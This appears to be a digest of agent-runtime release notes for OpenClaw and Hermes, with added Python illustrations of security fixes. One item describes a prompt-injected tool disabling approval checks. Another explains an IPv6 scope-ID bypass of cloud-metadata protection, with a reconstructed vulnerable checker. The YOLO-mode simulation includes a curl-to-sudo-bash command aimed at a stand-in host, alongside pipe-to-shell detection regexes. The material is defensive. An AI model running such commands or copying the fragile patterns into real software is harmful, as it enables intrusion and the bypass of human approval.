1. OpenClaw turns the beta.8 dependency cleanup into a stable release, then opens a new beta with auditability and channel UX work

    OpenClaw’s latest official movement is bigger than a normal patch cycle. The v2026.5.12 stable release packages the dependency externalization and runtime hardening that had been moving through the beta.6–beta.8 train: leaner installs for Slack, WhatsApp, Bedrock, Vertex, and sandbox dependency cones; isolated Telegram polling with local spooling; Codex/OpenAI auth-profile and fallback repairs; plugin install/update resilience; Windows sandbox and SecretRef credential tightening; and UI/history/reply delivery fixes. The new v2026.5.14-beta.1 then adds a fresh operator-facing layer: WhatsApp gets status reactions for queued, thinking, tool, done, error, and compaction lifecycle states; Telegram presentation payloads can render Mini App `web_app` buttons; subagent tasks are delivered as the child session’s first visible message instead of hidden only in a system prompt; mid-turn prompts can steer active runs by default; Telnyx realtime voice calls enter the release notes; heartbeat event payloads gain an explicit marker; Codex CLI sessions can be listed and bound from a paired node; and release validation now includes installed-package Docker user journeys, dependency evidence, and npm advisory gates. Nearby PRs keep the risk story concrete: #81880 requires canonical node platform IDs before applying desktop command defaults, #81451 caches hydrated skills without putting raw secrets into cache keys, and #68597 blocks symlink escapes in memory reads.
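
Two of the PRs named above are easy to get wrong in any agent runtime, so here is a worked Python illustration of both guards. It is an added example and not OpenClaw's code: the `read_memory` guard refuses a memory read whose real path leaves the memory root (the symlink escape #68597 blocks), and `skill_cache_key` keys a hydrated-skill cache on a keyed hash rather than the raw secret (the #81451 concern). Function names, the per-process salt and the temp-directory fixture are all assumptions for the demo.

```python
import hashlib
import hmac
import os
import secrets
import tempfile

# Hypothetical helpers, not OpenClaw's code: a memory-read guard that refuses
# symlink escapes, and a skill-cache key that never embeds a raw secret.


class MemoryEscape(Exception):
    """Raised when a requested path resolves outside the memory root."""


def resolve_inside(root: str, requested: str) -> str:
    """Return the real path of `requested` only if it stays under `root`.

    Both sides go through realpath, so a symlink planted inside the memory
    directory that points at a file elsewhere is rejected even though its
    lexical path looks fine.
    """
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, requested))
    # commonpath is the robust containment test; a plain startswith check
    # would accept '/memory-evil' as being inside '/memory'.
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise MemoryEscape(f"{requested!r} resolves to {candidate!r}, outside {real_root!r}")
    return candidate


def read_memory(root: str, requested: str) -> bytes:
    with open(resolve_inside(root, requested), "rb") as fh:
        return fh.read()


# Per-process random salt (assumption): keys stay stable for this process but a
# leaked cache listing cannot be used to guess secrets offline.
_CACHE_SALT = secrets.token_bytes(32)


def skill_cache_key(skill_name: str, hydrated_secret: str) -> str:
    """Key a hydrated-skill cache entry on a keyed hash of the secret, not the secret."""
    mac = hmac.new(_CACHE_SALT, digestmod=hashlib.sha256)
    mac.update(skill_name.encode())
    mac.update(b"\x00")
    mac.update(hydrated_secret.encode())
    return f"{skill_name}:{mac.hexdigest()[:32]}"


def demo_symlink_escape() -> dict:
    """Constructed fixture: a memory dir with one note and one escaping symlink."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "memory")
    os.makedirs(root)
    outside = os.path.join(base, "outside-secret.txt")
    with open(outside, "w") as fh:
        fh.write("private key material")
    with open(os.path.join(root, "note.md"), "w") as fh:
        fh.write("legit memory")
    os.symlink(outside, os.path.join(root, "escape.md"))

    results = {"inside": read_memory(root, "note.md") == b"legit memory"}
    for bad in ("escape.md", "../outside-secret.txt"):
        try:
            read_memory(root, bad)
            results[bad] = "leaked"
        except MemoryEscape:
            results[bad] = "blocked"
    return results
```

Both the symlink and the `..` traversal collapse to the same check because containment is decided on the resolved path, not on the string the caller supplied.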

    Tags: OpenClaw · Release · Risk Watch
2. Hermes’ workflow core arrives beside a URL-safety bypass fix and profile-scoped scheduled jobs

    Hermes’ strongest fresh update is architectural: PR #25806 adds the workflow system core, including workflow policy, store, DAG, gate, materialization foundations, Core/dashboard APIs for reading workflows, inboxes, promotions, gates, and materialization, plus stale-inbox promotion guards. That is the first sign of a more formal task/workflow layer rather than ad-hoc agent turns. The risk item to notice is #25961: IPv6 scope IDs such as `fe80::1%eth0` could make URL safety parsing throw and silently skip all resolved addresses, potentially allowing a hostname controlled by an attacker to bypass link-local or cloud-metadata protections; the fix strips scope IDs and fails closed on unparseable addresses. A second reliability fix, #25962, resolves yesterday’s split clarify-timeout problem by making the CLI callback honor `agent.clarify_timeout` before the older `clarify.timeout` key. PR #25917 adds profile-scoped scheduled jobs so cron jobs can run with a specific Hermes profile’s config, scripts, skills, and memory paths. The surrounding channel and operator polish is also practical: #25956 strips emoji, diagrams, inline code, tables, and symbols before TTS so spoken replies stop reading UI artifacts; #25960 prevents native Windows Telegram `/restart` from leaving the gateway stopped; #25959 tightens Discord channel-directory resurrection behavior and lowers batching latency; #25958 allows configured Discord role mentions as triggers; and #25954 adds a read-only Kanban metrics CLI for review and verification gates.
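
The #25961 failure mode is worth seeing in code, because the dangerous part is not the scope ID itself but what happens to the rest of the address list once parsing throws. The following is an added Python example, not Hermes' own URL-safety code: `fragile_check` reconstructs the pattern the fix replaces (a swallowed parse error that leaves the remaining resolved addresses unchecked), and `hardened_check` strips the zone and fails closed. `socket.inet_pton` is used in the fragile variant because it rejects zone IDs on every Python version, whereas `ipaddress` accepts them since 3.9; the sample DNS answer is constructed.

```python
import ipaddress
import socket

# Constructed DNS answer for an attacker-controlled hostname: a zone-scoped
# link-local address first, the cloud metadata address second.
SAMPLE_RESOLVED = ["fe80::1%eth0", "169.254.169.254"]


def _is_blocked_ip(ip) -> bool:
    """Policy: refuse anything that is not a public unicast address."""
    mapped = getattr(ip, "ipv4_mapped", None)  # ::ffff:169.254.169.254 -> apply v4 policy
    if mapped is not None:
        ip = mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def fragile_check(resolved) -> bool:
    """Reconstruction of the pre-fix shape (not Hermes' code).

    A parse error on the first address escapes the loop, is swallowed, and the
    function falls through to 'allowed' without ever seeing 169.254.169.254.
    """
    try:
        for raw in resolved:
            family = socket.AF_INET6 if ":" in raw else socket.AF_INET
            socket.inet_pton(family, raw)  # raises OSError on 'fe80::1%eth0'
            if _is_blocked_ip(ipaddress.ip_address(raw)):
                return False
    except (OSError, ValueError):
        pass
    return True


def strip_scope_id(raw: str) -> str:
    """'fe80::1%eth0' -> 'fe80::1'. The zone selects an interface; it carries no policy meaning."""
    return raw.split("%", 1)[0]


def hardened_check(resolved) -> bool:
    """Fail closed: an empty answer and an unparseable address are both 'blocked'."""
    if not resolved:
        return False
    for raw in resolved:
        try:
            ip = ipaddress.ip_address(strip_scope_id(raw))
        except ValueError:
            return False
        if _is_blocked_ip(ip):
            return False
    return True
```

The hardened form also unwraps IPv4-mapped IPv6 so `::ffff:169.254.169.254` is judged as the metadata address it really is; any resolver-based check that forgets this has a second bypass of the same shape.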

    Tags: Hermes · Risk Watch · New AgentOS
3. OpenClaw’s next operator cluster makes approvals readable, scoped, and less likely to poison later runs

    The most useful OpenClaw updates in the first Beijing May 15 window are about making real operators understand and trust what the agent is about to do. PR #81864 adds configurable plain-language plugin approval prompts so chat approvals can show a short summary, step list, risk line, and choices instead of a raw dump of command text, tool IDs, session keys, expiry, and `/approve` syntax. PR #81380 binds approval list and resolve paths to stored requester metadata, reducing the chance that one requester can see or resolve another requester’s pending approval. PR #80922 routes POSIX allowlists and allow-always persistence through a Tree-sitter command authorization planner, replacing the legacy chain/pipeline/heredoc parser and producing clearer enforced command renderings. The same window also fixes operational drift: PR #75270 stops temporary fallback models from becoming sticky after the primary model recovers, #81868 keeps exact-command cron turns from loading heavyweight bootstrap/memory context by default, #81870 forwards auth stores into image/video/music generation so OAuth-backed Codex tokens can refresh, and #81764 makes Telegram HTML parse fallback produce readable text with preserved links. PR #81851 is notable but experimental: a Claude CLI interactive backend streams reasoning through a local TLS proxy, so treat it as a sensitive preview rather than a default path.
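
The #81380 point, that an approval must stay bound to whoever requested it, is a small amount of code but easy to skip in a chat-driven agent. The following Python store is an added illustration and not OpenClaw's implementation: it records the requester on each pending approval, filters list and resolve by that identity, expires entries, and renders the short operator prompt #81864 describes instead of dumping IDs. Class and method names, the requester identifier format and the injectable clock are assumptions for the demo.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Illustrative approval store, not OpenClaw's: every pending approval remembers
# who asked, and listing/resolving are filtered by that identity.


class ApprovalError(Exception):
    pass


@dataclass
class PendingApproval:
    approval_id: str
    requester: str          # hypothetical identity string, e.g. "session:abc" or "node:laptop"
    command: str
    risk_line: str
    expires_at: float
    decision: Optional[str] = None


class ApprovalStore:
    def __init__(self, ttl_seconds: float = 300.0, clock: Callable[[], float] = time.monotonic):
        self._items: Dict[str, PendingApproval] = {}
        self._ttl = ttl_seconds
        self._clock = clock  # injectable so expiry can be tested without sleeping

    def create(self, requester: str, command: str, risk_line: str) -> PendingApproval:
        item = PendingApproval(secrets.token_urlsafe(8), requester, command, risk_line,
                               self._clock() + self._ttl)
        self._items[item.approval_id] = item
        return item

    def _lookup(self, requester: str, approval_id: str) -> PendingApproval:
        item = self._items.get(approval_id)
        # One error for 'missing', 'expired' and 'not yours', so a second requester
        # cannot probe which approval IDs exist.
        if item is None or item.requester != requester or self._clock() > item.expires_at:
            raise ApprovalError("no such pending approval")
        return item

    def list_pending(self, requester: str) -> List[PendingApproval]:
        now = self._clock()
        return [i for i in self._items.values()
                if i.requester == requester and i.decision is None and now <= i.expires_at]

    def resolve(self, requester: str, approval_id: str, decision: str) -> PendingApproval:
        if decision not in ("allow-once", "allow-always", "deny"):
            raise ApprovalError(f"unknown decision {decision!r}")
        item = self._lookup(requester, approval_id)
        if item.decision is not None:
            raise ApprovalError("already resolved")
        item.decision = decision
        return item

    def render_prompt(self, item: PendingApproval) -> str:
        """Short operator-facing prompt; IDs, session keys and expiry stay server-side."""
        return (f"Run `{item.command}`?\n"
                f"Risk: {item.risk_line}\n"
                "Choices: allow-once / allow-always / deny")


def try_resolve(store: ApprovalStore, requester: str, approval_id: str, decision: str) -> bool:
    """True if the decision was accepted for this requester, False if refused."""
    try:
        store.resolve(requester, approval_id, decision)
        return True
    except ApprovalError:
        return False
```

Keeping the requester check inside `_lookup` means every future path that resolves an approval inherits the binding instead of re-implementing it.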

    Tags: OpenClaw · Risk Watch
4. Hermes adds structured HTTP and argv tools to escape the bash-quoting trap

    The strongest Hermes update in this window is a practical tool-runtime fix: stop forcing every machine-shaped action through `bash -c`. PR #25861 adds a structured `http` tool using `httpx.Client` with explicit method, URL, headers, JSON/body, params, and timeout fields, after production telemetry showed a single apostrophe in a JSON payload breaking shell quoting and triggering repeated retries. PR #25864 adds an argv-list form to the terminal tool so commands can run with `shell=False` and byte-for-byte arguments instead of a shell-safe string. PR #25862 then teaches the existing terminal path to recognize bash parse errors such as unexpected EOF and return an actionable hint pointing to the structured HTTP tool or safer quoting forms. The surrounding reliability work is also operator-relevant: issue #25859 documents two separate clarify timeout keys that make CLI/TUI sessions auto-decide after 120 seconds even when gateway clarify timeout is raised; PR #25856 fixes Telegram slash-confirm previews that silently fail on Markdown-sensitive characters; #25857 keeps migrated Codex `default_permissions` as a true top-level TOML key; #25858 skips admin-gated LiteLLM `/v1/models/{model}` probes for unrecognized servers; and #25624 stops deterministic MCP OAuth failures from repeatedly opening browser auth flows.
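
The apostrophe failure in #25861 and the argv fix in #25864 reproduce in a few lines. The example below is added here and is not Hermes' tool code: it runs the same constructed JSON payload three ways (dropped into a single-quoted `sh -c` string, quoted with `shlex.quote`, and passed as an argv element with no shell), and adds a small classifier in the spirit of #25862 that turns a shell parse error into a hint. It assumes a POSIX `sh` is on PATH; the marker strings and hint text are assumptions.

```python
import shlex
import subprocess
import sys
from typing import Optional

# Constructed payload: the kind of JSON body with one apostrophe that broke a
# shell-quoted command string in the telemetry the page describes.
PAYLOAD = '{"note": "it\'s fine"}'


def echo_via_shell_string(payload: str) -> subprocess.CompletedProcess:
    """The trap: the payload is interpolated into a single-quoted shell word."""
    cmd = f"printf '%s' '{payload}'"
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)


def echo_via_shell_quoted(payload: str) -> subprocess.CompletedProcess:
    """Still a shell string, but every argument goes through shlex.quote."""
    cmd = "printf '%s' " + shlex.quote(payload)
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)


def echo_via_argv(payload: str) -> subprocess.CompletedProcess:
    """Structured argv form: no shell ever parses the bytes (shell=False is the default)."""
    return subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", payload],
        capture_output=True, text=True,
    )


# Lower-cased substrings seen in bash, dash and busybox parse errors (assumption).
_PARSE_MARKERS = ("unexpected eof", "unterminated quoted", "syntax error")


def shell_parse_hint(result: subprocess.CompletedProcess) -> Optional[str]:
    """Return an actionable hint when a non-zero exit looks like a shell parse error."""
    if result.returncode == 0:
        return None
    err = result.stderr.lower()
    if any(marker in err for marker in _PARSE_MARKERS):
        return ("the shell could not parse this command; pass arguments as an argv list "
                "(shell=False) or quote them with shlex.quote, and send JSON bodies "
                "through the structured http tool")
    return None
```

Retrying the first form never helps, which is exactly why the telemetry showed repeated retries: the failure is in parsing, so the hint has to steer the model to a different form rather than to try again.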

    Tags: Hermes · Risk Watch · Use Case

More to watch

2026-05-14 · Product update · Watch

OpenClaw beta.8 trims core dependencies and hardens Telegram ingress, child-model defaults, credentials, and rich replies

OpenClaw v2026.5.12-beta.8 is another broad operator release, but the center of gravity has shifted from one-off channel bugs to runtime shape. Bedrock, Bedrock Mantle, Slack, OpenShell sandbox, and Anthropic Vertex move out of core so default installs no longer drag in those dependency cones unless the matching providers or plugins are installed. Telegram Bot API polling moves to an isolated worker with a durable local spool so main event-loop stalls do not stop inbound message collection. The release also adds ACP backend fallbacks before output is emitted, a persisted Control UI auto-scroll selector, monotonic transcript sequence repair for stale SSE history, Windows `USERPROFILE` coverage in sandbox blocked home roots, stricter provider credential resolution through structured SecretRefs, bodyless media-fetch heap avoidance, onboarding flag forwarding for provider-specific API keys, plugin-provider discovery from setup env vars, auth-profile stale-lock reclaim, Codex OAuth refresh error classification, browser scope-loop reduction, plugin SDK subpath compatibility, rich/card-only outbound content recognition, and WebChat/TUI mirroring for Codex `tools.message` replies.

2026-05-14 · Risk note · Risk

Hermes approval hardening closes a critical YOLO-mode bypass and exposes long-session failure modes

The strongest Hermes item in the late May 14 window is approval safety, not another UI tweak. PR #23835 says `HERMES_YOLO_MODE` was read from `os.getenv()` on every approval check, so a skill or prompt-injected in-process tool could mutate `os.environ` and disable command approval checks after startup. The same PR tightens LLM smart-approval parsing from substring matching to exact `APPROVE`, logs dangerous background auto-approvals that previously had no audit trail, and expands pipe-to-shell detection to catch `/bin/bash` and `bash -c` variants. Nearby reliability work matters for the same operator audience: PR #25716 adds hierarchical long-context compression so huge transcripts can be summarized in bounded segments instead of timing out, while issue #25723 reports that one streaming provider error can disable streaming for an entire session rather than just the failing request.
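
The three #23835 changes share one lesson: a security decision must not depend on state that in-process code can rewrite or on a parser that is looser than the decision it feeds. The Python below is an added example, not Hermes' approval code. It snapshots `HERMES_YOLO_MODE` into an immutable policy at startup and shows that a later `os.environ` mutation from a simulated injected tool no longer disables checks, compares substring versus exact `APPROVE` parsing, and widens a pipe-to-shell pattern to `/bin/bash` and `bash -c`. The narrow regex is a reconstruction of the pattern shape, not the project's actual expression, and the command string is constructed.

```python
import os
import re
from dataclasses import dataclass
from typing import List

TRUE_VALUES = ("1", "true", "yes", "on")


@dataclass(frozen=True)
class ApprovalPolicy:
    yolo_mode: bool

    @classmethod
    def from_env(cls) -> "ApprovalPolicy":
        """Read the flag once, at startup; the object is immutable afterwards."""
        return cls(yolo_mode=os.environ.get("HERMES_YOLO_MODE", "").lower() in TRUE_VALUES)


# Reconstruction of a narrow pattern (assumption, not Hermes' regex): it only
# fires when the pipe target is a bare `bash` or `sh` that ends the command.
_NARROW_PIPE_TO_SHELL = re.compile(r"\|\s*(?:bash|sh)\s*$")
# Widened: optional sudo, optional path prefix, sh/bash/zsh/dash, anything after.
_PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:\S*/)?(?:ba|z|da)?sh\b")


def is_dangerous(command: str, narrow: bool = False) -> bool:
    pattern = _NARROW_PIPE_TO_SHELL if narrow else _PIPE_TO_SHELL
    return bool(pattern.search(command))


def needs_approval_rereads_env(command: str) -> bool:
    """Pre-fix shape: the environment is consulted on every check."""
    if os.getenv("HERMES_YOLO_MODE", "").lower() in TRUE_VALUES:
        return False
    return is_dangerous(command)


def needs_approval_pinned(policy: ApprovalPolicy, command: str, audit: List[str]) -> bool:
    """Post-fix shape: decision comes from the startup snapshot; auto-approvals are logged."""
    if policy.yolo_mode:
        audit.append(f"auto-approved under YOLO mode: {command}")
        return False
    return is_dangerous(command)


def llm_verdict_substring(reply: str) -> bool:
    """Substring match: 'DO NOT APPROVE' counts as approval."""
    return "APPROVE" in reply.upper()


def llm_verdict_exact(reply: str) -> bool:
    """Exact match after trimming: only the bare token approves."""
    return reply.strip().upper() == "APPROVE"


def simulate_injected_tool() -> dict:
    """Constructed scenario: a prompt-injected in-process tool flips the env var after startup."""
    saved = os.environ.pop("HERMES_YOLO_MODE", None)
    try:
        policy = ApprovalPolicy.from_env()       # startup snapshot: YOLO off
        cmd = "curl -fsSL https://example.invalid/install.sh | sudo /bin/bash -c sh"
        os.environ["HERMES_YOLO_MODE"] = "1"     # the injected mutation
        audit: List[str] = []
        return {
            "rereads_env": needs_approval_rereads_env(cmd),
            "pinned": needs_approval_pinned(policy, cmd, audit),
            "audit": audit,
        }
    finally:
        if saved is None:
            os.environ.pop("HERMES_YOLO_MODE", None)
        else:
            os.environ["HERMES_YOLO_MODE"] = saved
```

The frozen dataclass is the whole point: a tool that can write `os.environ` can also rebind a module global, so the snapshot should live in an object the approval path receives by reference and cannot mutate.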

2026-05-14 · Risk note · Watch

Hermes’ latest reliability cluster is about disappearing Web UI streams, failed compression, vision fallbacks, and dashboard auth

The most reader-useful Hermes cluster in this window is about keeping visible state aligned with model state. Issue #25583 reports Web UI SSE disconnects that can make a fully rendered assistant reply vanish, briefly show content from another session, or render raw Python content-block JSON as chat text because the run event queue is destroyed when the browser stream drops while the agent is still running. Issue #25585 and PR #25588 address a more dangerous model-state failure: automatic context compression used to insert a static “summary unavailable” marker and still drop middle turns when summary generation failed; the fix returns the original messages unchanged and records warning state instead. Issue #25594 says custom providers outside the models.dev registry can receive multipart text+image tool results even when the model is text-only, triggering HTTP 400 errors such as `text is not set`; #25602 asks for dashboard visibility and test controls for auxiliary fallback chains such as vision and compression. Nearby PRs fill in the same reliability theme: #25577 coerces tool args whose schema types are declared through anyOf/oneOf, #25580 moves cloud browser providers into plugins, #25584/#25587 make text fallback choices resolvable on platforms without buttons, and #20515 gates dashboard HTML/assets and WebSockets behind Tailscale identity allowlists when configured.
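
The compression items from the two Hermes notes, #25716's bounded-segment summarization and #25588's fail-closed fallback, fit one worked example. The Python below is added here and is not Hermes' context-compression code: `summarize_hierarchically` feeds the summarizer segments capped at `max_chars` and folds partial summaries until one remains, `compress_dropping` reproduces the pre-fix shape that inserts a static marker and still drops the middle turns on failure, and `compress_fail_closed` returns the original list unchanged with a warning. The transcript and both summarizers are constructed; no model is called.

```python
from typing import Callable, Dict, List, Optional, Tuple

Message = Dict[str, str]
Summarizer = Callable[[str], str]   # takes transcript text, returns a summary; may raise

SUMMARY_UNAVAILABLE = "[summary unavailable]"


def _split(messages: List[Message], keep_head: int, keep_tail: int):
    cut = len(messages) - keep_tail
    return messages[:keep_head], messages[keep_head:cut], messages[cut:]


def _render(msgs: List[Message]) -> str:
    return "\n".join(f"{m['role']}: {m['content']}" for m in msgs)


def _segments(msgs: List[Message], max_chars: int) -> List[List[Message]]:
    """Greedy grouping so each summarizer call sees at most max_chars of content
    (a single oversized message still travels alone rather than being dropped)."""
    out, cur, size = [], [], 0
    for m in msgs:
        n = len(m["content"])
        if cur and size + n > max_chars:
            out.append(cur)
            cur, size = [], 0
        cur.append(m)
        size += n
    if cur:
        out.append(cur)
    return out


def summarize_hierarchically(middle: List[Message], summarize: Summarizer,
                             max_chars: int, max_depth: int = 4) -> str:
    """Summarize bounded segments, then fold the partial summaries, until one remains."""
    level = middle
    for _ in range(max_depth):
        partials = [summarize(_render(seg)) for seg in _segments(level, max_chars)]
        if len(partials) == 1:
            return partials[0]
        level = [{"role": "summary", "content": p} for p in partials]
    return "\n".join(m["content"] for m in level)  # depth cap reached: keep all partials


def compress_dropping(messages: List[Message], summarize: Summarizer, keep_head: int = 1,
                      keep_tail: int = 2, max_chars: int = 400) -> List[Message]:
    """Pre-fix shape: on failure a static marker replaces the middle anyway, so turns are lost."""
    if len(messages) <= keep_head + keep_tail:
        return messages
    head, middle, tail = _split(messages, keep_head, keep_tail)
    try:
        summary = summarize_hierarchically(middle, summarize, max_chars)
    except Exception:
        summary = SUMMARY_UNAVAILABLE
    return head + [{"role": "system", "content": summary}] + tail


def compress_fail_closed(messages: List[Message], summarize: Summarizer, keep_head: int = 1,
                         keep_tail: int = 2, max_chars: int = 400
                         ) -> Tuple[List[Message], Optional[str]]:
    """Post-fix shape: failure returns the original list unchanged plus a warning to surface."""
    if len(messages) <= keep_head + keep_tail:
        return messages, None
    head, middle, tail = _split(messages, keep_head, keep_tail)
    try:
        summary = summarize_hierarchically(middle, summarize, max_chars)
    except Exception as exc:
        return messages, f"compression skipped: {type(exc).__name__}: {exc}"
    return head + [{"role": "system", "content": summary}] + tail, None


# Constructed transcript: one system prompt, twenty ~128-char turns, a final exchange.
TRANSCRIPT: List[Message] = (
    [{"role": "system", "content": "You are a helper."}]
    + [{"role": "user" if i % 2 == 0 else "assistant", "content": f"turn {i}: " + "x" * 120}
       for i in range(20)]
    + [{"role": "user", "content": "final question"},
       {"role": "assistant", "content": "final answer"}]
)


class CountingSummarizer:
    """Fake model: returns a short fixed-shape summary and counts calls."""
    def __init__(self) -> None:
        self.calls = 0

    def __call__(self, text: str) -> str:
        self.calls += 1
        return f"S[{len(text)}]"


def failing_summarizer(text: str) -> str:
    raise TimeoutError("summary generation timed out")
```

With `max_chars=400` the twenty middle turns group into seven segments, so the first level costs seven calls and the second folds the seven partials in one; the failing summarizer exercises the difference between the two compressors.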

2026-05-14 · Product update · Watch

OpenClaw beta.6 turns this week’s scattered safety fixes into an upgrade target

OpenClaw v2026.5.12-beta.6 is the strongest new item in this run because it packages a broad operator-hardening wave into one official prerelease. The release stops iMessage media-only sends from leaking visible placeholder text, creates configured agent sessions before first agent-to-agent sends, moves the Gateway protocol to v4 with explicit delta/replace streaming frames, hides pending Node pairing capabilities until approval, requires approval for setup-code device pairing, browser pairing, and Control UI proxy-scoped access, and hardens trusted-proxy validation. It also caps inbound media download streams for Feishu / WhatsApp / Line, narrows plugin install-time code scans to plugin-owned runtime entrypoints while keeping dependency manifest denylist checks, centralizes config mutation retries, preserves and prunes managed peer dependencies, pins Docker setup paths so stale host .env paths do not leak into containers, and fixes several auth/profile/runtime edges including Copilot Gemini image descriptions, Anthropic session-rotation amnesia, OpenAI-compatible schema items, idle-model watchdog fallback, centralized transcript redaction, Telegram polling stalls, token-rotation offsets, delegated-session tool restrictions, node exec provenance, and hook CLI authority. A new issue, #81548, is worth reading alongside the release: it reports 25-30 seconds of OpenClaw overhead per isolated-agent turn on v2026.5.7 even when direct Ollama inference takes about 2.3 seconds, pointing at prompt assembly as the suspected bottleneck.